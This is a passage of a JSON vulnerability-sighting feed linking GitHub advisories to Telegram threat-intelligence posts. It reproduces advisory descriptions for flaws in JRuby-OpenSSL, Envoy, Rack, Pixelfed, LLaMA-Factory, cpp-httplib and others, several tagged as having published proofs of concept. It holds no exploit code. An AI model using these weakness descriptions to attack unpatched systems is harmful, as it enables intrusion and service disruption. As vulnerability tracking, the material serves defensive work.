https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": "dea20e78-0a04-47df-96fa-8caca936f1e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JG6P-7FG8-9HH6", "type": "published-proof-of-concept", "source": "Telegram/nSRvyMMuDO4LVDIhC_Rx7gx27JwRYoRyOv-3439P5STagmw", "content": "", "creation_timestamp": "2026-04-17T23:20:07.000000Z"}, {"uuid": "d12d9115-1c1c-4fdf-bbc1-9480189ef5c8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W5J3-8FCR-H87W", "type": "published-proof-of-concept", "source": "Telegram/nSRvyMMuDO4LVDIhC_Rx7gx27JwRYoRyOv-3439P5STagmw", "content": "", "creation_timestamp": "2026-04-17T23:20:07.000000Z"}, {"uuid": "adfb218c-bfc3-4750-9648-850b7ecdaa1a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-72QJ-48G4-5XGX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15410", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46551\n\ud83d\udd25 CVSS Score: 5.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: JRuby-OpenSSL is an add-on gem for JRuby that emulates the Ruby OpenSSL native library. Starting in JRuby-OpenSSL version 0.12.1 and prior to version 0.15.4 (corresponding to JRuby versions starting in 9.3.4.0 prior to 9.4.12.1 and 10.0.0.0 prior to 10.0.0.1), when verifying SSL certificates, JRuby-OpenSSL does not verify that the hostname presented in the certificate matches the one the user tries to connect to. This means a man-in-the-middle could just present any valid cert for a completely different domain they own, and JRuby would accept the cert. Anybody using JRuby to make requests of external APIs, or scraping the web, that depends on https to connect securely. JRuby-OpenSSL version 0.15.4 contains a fix for the issue. This fix is included in JRuby versions 10.0.0.1 and 9.4.12.1.\n\ud83d\udccf Published: 2025-05-07T16:12:23.771Z\n\ud83d\udccf Modified: 2025-05-07T20:10:54.558Z\n\ud83d\udd17 References:\n1. https://github.com/jruby/jruby-openssl/security/advisories/GHSA-72qj-48g4-5xgx\n2. https://github.com/jruby/jruby-openssl/commit/31a56d690ce9b8af47af09aaaf809081949ed285", "creation_timestamp": "2025-05-07T20:22:48.000000Z"}, {"uuid": "004e4355-de08-4dff-978e-a984592cfc8f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5476-9JJQ-563M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19605", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53007\n\ud83d\udd25 CVSS Score: 8.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: arduino-esp32 provides an Arduino core for the ESP32. Versions prior to 3.3.0-RC1 and 3.2.1 contain a HTTP Response Splitting vulnerability. The `sendHeader` function takes arbitrary input for the HTTP header name and value, concatenates them into an HTTP header line, and appends this to the outgoing HTTP response headers. There is no validation or sanitization of the `name` or `value` parameters before they are included in the HTTP response. If an attacker can control the input to `sendHeader` (either directly or indirectly), they could inject carriage return (`\\r`) or line feed (`\\n`) characters into either the header name or value. This could allow the attacker to inject additional headers, manipulate the structure of the HTTP response, potentially inject an entire new HTTP response (HTTP Response Splitting), and/or ause header confusion or other HTTP protocol attacks. Versions 3.3.0-RC1 and 3.2.1 contain a fix for the issue.\n\ud83d\udccf Published: 2025-06-26T14:45:40.839Z\n\ud83d\udccf Modified: 2025-06-26T14:45:40.839Z\n\ud83d\udd17 References:\n1. https://github.com/espressif/arduino-esp32/security/advisories/GHSA-5476-9jjq-563m\n2. https://github.com/espressif/arduino-esp32/commit/21640ac82a1bb5efa8cf0b3841be1ac80add6785\n3. https://github.com/espressif/arduino-esp32/blob/9e61fa7e4bce59c05cb17c15b11b53b9bafca077/libraries/WebServer/src/WebServer.cpp#L504-L521\n4. https://github.com/espressif/arduino-esp32/blob/9e61fa7e4bce59c05cb17c15b11b53b9bafca077/libraries/WebServer/src/WebServer.cpp#L577-L582", "creation_timestamp": "2025-06-26T14:51:55.000000Z"}, {"uuid": "e162a0fa-349c-41cd-8473-4ae6a9556acf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-42RC-RVRX-CMMW", "type": "published-proof-of-concept", "source": "Telegram/3g7V6SV_71PzaXn8Yubvw4Z7qK4NE-jaYcye5068Hc2mjiw", "content": "", "creation_timestamp": "2026-04-17T23:20:15.000000Z"}, {"uuid": "681e1871-ae87-473d-bdf7-b45d48895496", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCP8-GH74-97HQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15400", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30147\n\ud83d\udd25 CVSS Score: 8.7 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: Besu Native contains scripts and tooling that is used to build and package the native libraries used by the Ethereum client Hyperledger Besu. Besu 24.7.1 through 25.2.2, corresponding to besu-native versions 0.9.0 through 1.2.1, have a potential consensus bug for the precompiles ALTBN128_ADD (0x06), ALTBN128_MUL (0x07), and ALTBN128_PAIRING (0x08). These precompiles were reimplemented in besu-native using gnark-crypto's bn254 implementation, as the former implementation used a library which was no longer maintained and not sufficiently performant. The new gnark implementation was initially added in version 0.9.0 of besu-native but was not utilized by Besu until version 0.9.2 in Besu 24.7.1. The issue is that there are EC points which may be crafted which are in the correct subgroup but are not on the curve and the besu-native gnark implementation was relying on subgroup checks to perform point-on-curve checks as well. The version of gnark-crypto used at the time did not do this check when performing subgroup checks. The result is that it was possible for Besu to give an incorrect result and fall out of consensus when executing one of these precompiles against a specially crafted input point. Additionally, homogenous Besu-only networks can potentially enshrine invalid state which would be incorrect and difficult to process with patched versions of besu which handle these calls correctly. The underlying defect has been patched in besu-native release 1.3.0. The fixed version of Besu is version 25.3.0. As a workaround for versions of Besu with the problem, the native precompile for altbn128 may be disabled in favor of the pure-java implementation. The pure java implementation is significantly slower, but does not have this consensus issue.\n\ud83d\udccf Published: 2025-05-07T18:27:41.736Z\n\ud83d\udccf Modified: 2025-05-07T18:27:41.736Z\n\ud83d\udd17 References:\n1. https://github.com/hyperledger/besu-native/security/advisories/GHSA-jcp8-gh74-97hq\n2. https://github.com/hyperledger/besu/blob/main/besu/src/main/java/org/hyperledger/besu/cli/options/NativeLibraryOptions.java#L31-L38", "creation_timestamp": "2025-05-07T19:22:39.000000Z"}, {"uuid": "e130f10e-3891-4422-9265-976d04e65c95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C7CM-838G-6G67", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15458", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46821\n\ud83d\udd25 CVSS Score: 5.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)\n\ud83d\udd39 Description: Envoy is a cloud-native edge/middle/service proxy. Prior to versions 1.34.1, 1.33.3, 1.32.6, and 1.31.8, Envoy's URI template matcher incorrectly excludes the `*` character from a set of valid characters in the URI path. As a result URI path containing the `*` character will not match a URI template expressions. This can result in bypass of RBAC rules when configured using the `uri_template` permissions. This vulnerability is fixed in Envoy versions v1.34.1, v1.33.3, v1.32.6, v1.31.8. As a workaround, configure additional RBAC permissions using `url_path` with `safe_regex` expression.\n\ud83d\udccf Published: 2025-05-07T21:24:07.891Z\n\ud83d\udccf Modified: 2025-05-07T21:24:07.891Z\n\ud83d\udd17 References:\n1. https://github.com/envoyproxy/envoy/security/advisories/GHSA-c7cm-838g-6g67", "creation_timestamp": "2025-05-07T22:23:22.000000Z"}, {"uuid": "fa4d7ff6-a8ff-428a-a53c-b6fd23493d76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XPPV-4JRX-QF8M", "type": "published-proof-of-concept", "source": "Telegram/pKVsSWpOH4ztPjCePA6f2TZasDjFWE2MPBTfIhx3aN4UBbI", "content": "", "creation_timestamp": "2026-04-17T23:20:20.000000Z"}, {"uuid": "35952afd-4de7-4ff9-9b08-3d397308eaee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GCCQ-H3XJ-JGVF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15430", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-25108\n\ud83d\udd25 CVSS Score: 9.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L)\n\ud83d\udd39 Description: Pixelfed is an open source photo sharing platform. When processing requests authorization was improperly and insufficiently checked, allowing attackers to access far more functionality than users intended, including to the administrative and moderator functionality of the Pixelfed server. This vulnerability affects every version of Pixelfed between v0.10.4 and v0.11.9, inclusive. A proof of concept of this vulnerability exists. This vulnerability affects every local user of a Pixelfed server, and can potentially affect the servers' ability to federate. Some user interaction is required to setup the conditions to be able to exercise the vulnerability, but the attacker could conduct this attack time-delayed manner, where user interaction is not actively required. This vulnerability has been addressed in version 0.11.11. Users are advised to upgrade. There are no known workarounds for this vulnerability.\n\ud83d\udccf Published: 2024-02-12T20:05:23.549Z\n\ud83d\udccf Modified: 2025-05-07T21:03:35.510Z\n\ud83d\udd17 References:\n1. https://github.com/pixelfed/pixelfed/security/advisories/GHSA-gccq-h3xj-jgvf\n2. https://github.com/pixelfed/pixelfed/commit/7e47d6dccb0393a2e95c42813c562c854882b037", "creation_timestamp": "2025-05-07T21:22:43.000000Z"}, {"uuid": "25a8923d-32fa-4b34-aa87-337401280346", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-FFQ7-898W-9JC4", "type": "published-proof-of-concept", "source": "Telegram/pKVsSWpOH4ztPjCePA6f2TZasDjFWE2MPBTfIhx3aN4UBbI", "content": "", "creation_timestamp": "2026-04-17T23:20:20.000000Z"}, {"uuid": "8b94c06b-05bb-47e7-93b3-03e9c9e981b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X8MX-2MR7-H9XG", "type": "published-proof-of-concept", "source": "Telegram/pKVsSWpOH4ztPjCePA6f2TZasDjFWE2MPBTfIhx3aN4UBbI", "content": "", "creation_timestamp": "2026-04-17T23:20:20.000000Z"}, {"uuid": "2f5c6111-bb85-491e-a5f6-cdb1ce0eaef9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ56-P8MM-QMXJ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19608", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-53002\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:H)\n\ud83d\udd39 Description: LLaMA-Factory is a tuning library for large language models. A remote code execution vulnerability was discovered in LLaMA-Factory versions up to and including 0.9.3 during the LLaMA-Factory training process. This vulnerability arises because the `vhead_file` is loaded without proper safeguards, allowing malicious attackers to execute arbitrary malicious code on the host system simply by passing a malicious `Checkpoint path` parameter through the `WebUI` interface. The attack is stealthy, as the victim remains unaware of the exploitation. The root cause is that the `vhead_file` argument is loaded without the secure parameter `weights_only=True`. Version 0.9.4 contains a fix for the issue.\n\ud83d\udccf Published: 2025-06-26T14:40:52.764Z\n\ud83d\udccf Modified: 2025-06-26T14:40:52.764Z\n\ud83d\udd17 References:\n1. https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-xj56-p8mm-qmxj\n2. https://github.com/hiyouga/LLaMA-Factory/commit/bb7bf51554d4ba8432333c35a5e3b52705955ede\n3. https://drive.google.com/file/d/1AddKm2mllsXfuvL4Tvbn_WJdjEOYXx4y/view?usp=sharing", "creation_timestamp": "2025-06-26T14:51:58.000000Z"}, {"uuid": "7f912232-f3ad-4be1-a9d8-7ce9e3238c8e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-422W-VRFJ-72G6", "type": "published-proof-of-concept", "source": "Telegram/pKVsSWpOH4ztPjCePA6f2TZasDjFWE2MPBTfIhx3aN4UBbI", "content": "", "creation_timestamp": "2026-04-17T23:20:20.000000Z"}, {"uuid": "40bb4a2d-eed6-4a80-9649-1da1d9d7cc6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VPFW-47H7-XJ4G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15460", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32441\n\ud83d\udd25 CVSS Score: 4.2 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Rack is a modular Ruby web server interface. Prior to version 2.2.14, when using the `Rack::Session::Pool` middleware, simultaneous rack requests can restore a deleted rack session, which allows the unauthenticated user to occupy that session. Rack session middleware prepares the session at the beginning of request, then saves is back to the store with possible changes applied by host rack application. This way the session becomes to be a subject of race conditions in general sense over concurrent rack requests. When using the `Rack::Session::Pool` middleware, and provided the attacker can acquire a session cookie (already a major issue), the session may be restored if the attacker can trigger a long running request (within that same session) adjacent to the user logging out, in order to retain illicit access even after a user has attempted to logout. Version 2.2.14 contains a patch for the issue. Some other mitigations are available. Either ensure the application invalidates sessions atomically by marking them as logged out e.g., using a `logged_out` flag, instead of deleting them, and check this flag on every request to prevent reuse; or implement a custom session store that tracks session invalidation timestamps and refuses to accept session data if the session was invalidated after the request began.\n\ud83d\udccf Published: 2025-05-07T23:01:19.722Z\n\ud83d\udccf Modified: 2025-05-07T23:01:19.722Z\n\ud83d\udd17 References:\n1. https://github.com/rack/rack/security/advisories/GHSA-vpfw-47h7-xj4g\n2. https://github.com/rack/rack/commit/c48e52f7c57e99e1e1bf54c8760d4f082cd1c89d\n3. https://github.com/rack/rack/blob/v2.2.13/lib/rack/session/abstract/id.rb#L263-L270", "creation_timestamp": "2025-05-07T23:23:30.000000Z"}, {"uuid": "6e5b9601-39a5-4da1-9f7e-ff3defbc0da7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJH7-P2FX-99VX", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15459", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46727\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Rack is a modular Ruby web server interface. Prior to versions 2.2.14, 3.0.16, and 3.1.14, `Rack::QueryParser` parses query strings and `application/x-www-form-urlencoded` bodies into Ruby data structures without imposing any limit on the number of parameters, allowing attackers to send requests with extremely large numbers of parameters. The vulnerability arises because `Rack::QueryParser` iterates over each `&amp;`-separated key-value pair and adds it to a Hash without enforcing an upper bound on the total number of parameters. This allows an attacker to send a single request containing hundreds of thousands (or more) of parameters, which consumes excessive memory and CPU during parsing. An attacker can trigger denial of service by sending specifically crafted HTTP requests, which can cause memory exhaustion or pin CPU resources, stalling or crashing the Rack server. This results in full service disruption until the affected worker is restarted. Versions 2.2.14, 3.0.16, and 3.1.14 fix the issue. Some other mitigations are available. One may use middleware to enforce a maximum query string size or parameter count, or employ a reverse proxy (such as Nginx) to limit request sizes and reject oversized query strings or bodies. Limiting request body sizes and query string lengths at the web server or CDN level is an effective mitigation.\n\ud83d\udccf Published: 2025-05-07T23:07:40.563Z\n\ud83d\udccf Modified: 2025-05-07T23:07:40.563Z\n\ud83d\udd17 References:\n1. https://github.com/rack/rack/security/advisories/GHSA-gjh7-p2fx-99vx\n2. https://github.com/rack/rack/commit/2bb5263b464b65ba4b648996a579dbd180d2b712\n3. https://github.com/rack/rack/commit/3f5a4249118d09d199fe480466c8c6717e43b6e3\n4. https://github.com/rack/rack/commit/cd6b70a1f2a1016b73dc906f924869f4902c2d74", "creation_timestamp": "2025-05-07T23:23:29.000000Z"}, {"uuid": "91d56b40-81a1-41e1-9423-b12f2a591d81", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8FJJ-9937-G84W", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15463", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-55651\n\ud83d\udd25 CVSS Score: 2 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P)\n\ud83d\udd39 Description: i-Educar is free, fully online school management software. Version 2.9 of the application fails to properly validate and sanitize user supplied input, leading to a stored cross-site scripting vulnerability that resides within the user type (Tipo de Usu\u00e1rio) input field. Through this attacker vector a malicious user might be able to retrieve information belonging to another user, which may lead to sensitive information leakage or other malicious actions. As of time of publication, no patched versions are known to exist.\n\ud83d\udccf Published: 2025-05-07T23:49:46.016Z\n\ud83d\udccf Modified: 2025-05-07T23:50:09.438Z\n\ud83d\udd17 References:\n1. https://github.com/portabilis/i-educar/security/advisories/GHSA-8fjj-9937-g84w", "creation_timestamp": "2025-05-08T00:23:30.000000Z"}, {"uuid": "07bc05e9-abb4-438e-9ab3-3559a178e8cd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJHG-GF59-P92H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19610", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52887\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. In version 0.21.0, when many http headers fields are passed in, the library does not limit the number of headers, and the memory associated with the headers will not be released when the connection is disconnected. This leads to potential exhaustion of system memory and results in a server crash or unresponsiveness. Version 0.22.0 contains a patch for the issue.\n\ud83d\udccf Published: 2025-06-26T14:31:52.092Z\n\ud83d\udccf Modified: 2025-06-26T14:31:52.092Z\n\ud83d\udd17 References:\n1. https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-xjhg-gf59-p92h\n2. https://github.com/yhirose/cpp-httplib/commit/28dcf379e82a2cdb544d812696a7fd46067eb7f9", "creation_timestamp": "2025-06-26T14:52:00.000000Z"}, {"uuid": "7d3e08df-14eb-4e1c-b18a-5a70de17e9f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RCQX-GC76-R9MV", "type": "published-proof-of-concept", "source": "Telegram/veDSMFN7ecyhltWdKUwpcYAyE-ogEw-qfchv6YBZH7Zn1oc", "content": "", "creation_timestamp": "2026-04-18T05:18:34.000000Z"}, {"uuid": "f8d34c2d-d30f-4f54-b03b-4ee741f3c913", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "published-proof-of-concept", "source": "Telegram/x12vbbUj9eUCE8CmwEAAyNGNC_B8MsPtTe6lQq2voLeHmZk", "content": "", "creation_timestamp": "2026-04-18T19:15:08.000000Z"}, {"uuid": "f2548d2f-c5eb-4df7-bc5f-9cc431c675ce", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G3CM-QG2V-2HJ5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15784", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-24808\n\ud83d\udd25 CVSS Score: 4.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N)\n\ud83d\udd39 Description: pyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451.\n\ud83d\udccf Published: 2024-02-06T03:17:16.532Z\n\ud83d\udccf Modified: 2025-05-09T16:31:14.196Z\n\ud83d\udd17 References:\n1. https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5\n2. https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd", "creation_timestamp": "2025-05-09T17:25:47.000000Z"}, {"uuid": "efeee332-e1eb-4518-862d-c86bdd9f0623", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XQ3M-2V4X-88GG", "type": "published-proof-of-concept", "source": "Telegram/FKYnF9b6jOQztogaME2Ub2uqb7DVqD6polRIMPyeJFMfQJw", "content": "", "creation_timestamp": "2026-04-18T19:00:12.000000Z"}, {"uuid": "823d65e0-21ce-4538-8602-ac1904d2d6bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-f886-m6hf-6m8v", "type": "seen", "source": "https://gist.github.com/konard/b4fdbcec737f21f5f1a690e8c86a6713", "content": "", "creation_timestamp": "2026-04-27T21:04:47.000000Z"}, {"uuid": "d197769a-3fb2-4e87-9503-3c49df979585", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78HX-GP6G-7MJ6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. https://access.redhat.com/errata/RHSA-2024:4581\n30. https://access.redhat.com/errata/RHSA-2024:4591\n31. https://access.redhat.com/errata/RHSA-2024:4672\n32. https://access.redhat.com/errata/RHSA-2024:4699\n33. https://access.redhat.com/errata/RHSA-2024:4761\n34. https://access.redhat.com/errata/RHSA-2024:4762\n35. https://access.redhat.com/errata/RHSA-2024:4960\n36. https://access.redhat.com/errata/RHSA-2024:5258\n37. https://access.redhat.com/errata/RHSA-2024:5634\n38. https://access.redhat.com/errata/RHSA-2024:7262\n39. https://access.redhat.com/security/cve/CVE-2024-1394\n40. https://bugzilla.redhat.com/show_bug.cgi?id=2262921\n41. https://github.com/golang-fips/openssl/commit/85d31d0d257ce842c8a1e63c4d230ae850348136\n42. https://github.com/golang-fips/openssl/security/advisories/GHSA-78hx-gp6g-7mj6\n43. https://github.com/microsoft/go-crypto-openssl/commit/104fe7f6912788d2ad44602f77a0a0a62f1f259f\n44. https://pkg.go.dev/vuln/GO-2024-2660\n45. https://vuln.go.dev/ID/GO-2024-2660.json", "creation_timestamp": "2025-05-12T23:29:31.000000Z"}, {"uuid": 